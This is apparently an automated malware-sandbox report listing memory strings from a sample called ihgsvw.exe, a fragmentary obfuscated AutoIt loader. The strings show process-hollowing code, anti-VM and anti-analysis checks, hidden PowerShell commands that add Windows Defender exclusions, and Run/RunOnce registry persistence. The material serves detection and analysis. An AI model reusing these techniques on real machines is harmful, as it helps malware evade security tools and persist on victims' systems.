      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)!
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $owmi = objget("winmgmts:\\localhost\root\securitycenter2")
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamezt
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenut
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("regshot.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") then
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;,r*
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)!q/
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ea27f591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: array
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runonce6z?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6qzz
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fe7cde|ze
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\rungz`
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\run
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disablesysrestore
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: runonceoyh
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: arrayslistjys
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36c2ab69
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f80cd4977c777331a38bd6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir7x0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runrx[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loop}xf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deadline
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mainpe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dc2be6ac6f6d73369f:g
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows nt\currentversion\spp\clients%g.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdir@gi
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disableuac
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\ihgsvw.exe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktl'm,
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktlwm|
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user~1\appdata\local\temp\folder~1\cdjr.ktl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\update.vbswl\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const waitonreturn = true
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353version\runonc
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshell.run file, hidden, waitonreturn
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = createobject("wscript.shell")0j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_botkillrh
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6}h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd3ae6ba446d62649f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d82cf491
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice.exe:
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b069%
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\runonce@
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc2ff391
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd26e8ba4441
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbox.exeists
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_sandbox_vm(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dc2be6ac6f6d73369fs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefree~
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefree
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray.exel
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emulator
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cf20f3a14479613e9f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antitask
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\policies\system
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: key3857
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @echo off
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \mshta.exe<
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables3
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesnaryx
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablescd23e39753777_
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablesciiarray9767m
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmdd
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \start.cmd720f4bc51747{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591rosor
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \run.vbs9c720ee97637d6i
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \run.vbsg
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.shell
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupdir720f4bc51747
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshell.run= wscript.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wscript.quit
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variablescd21f2a6447d6
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_dword
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdirrtnamec59767
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etaskmgr9fd2df5a1406c4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreate
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9ef3bc2b06967
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: etaskmgr
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: const hidden = 01406c4
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.lnk
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start.cmd"720f4bc51747
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0?
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c32bf4bb517f770c.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c]
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247cl
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e{
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6j
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb1cd5876247531994bcce137cbe4f905f4178f006
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247c>
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6\
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ez
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cc0ceea6516a6b0ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd23e39753777f38a797eb0855807ea04f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9c720ee97637d6621af97e8247crentversion\polici
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: set wshshell = wscript.createobject(
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: persistence-
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9cd21f2a6447d600cs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mshta.exests
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: variables
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770c
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9f82ff591
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c0
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9dd2beaa940707d27a3a0[
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770cf
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9d617
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemdirte
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execute_vbs
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9de2ff3a044776437b5a0.
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _y0x3856f9e32beaa77f76770ci
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regsvcs.exest
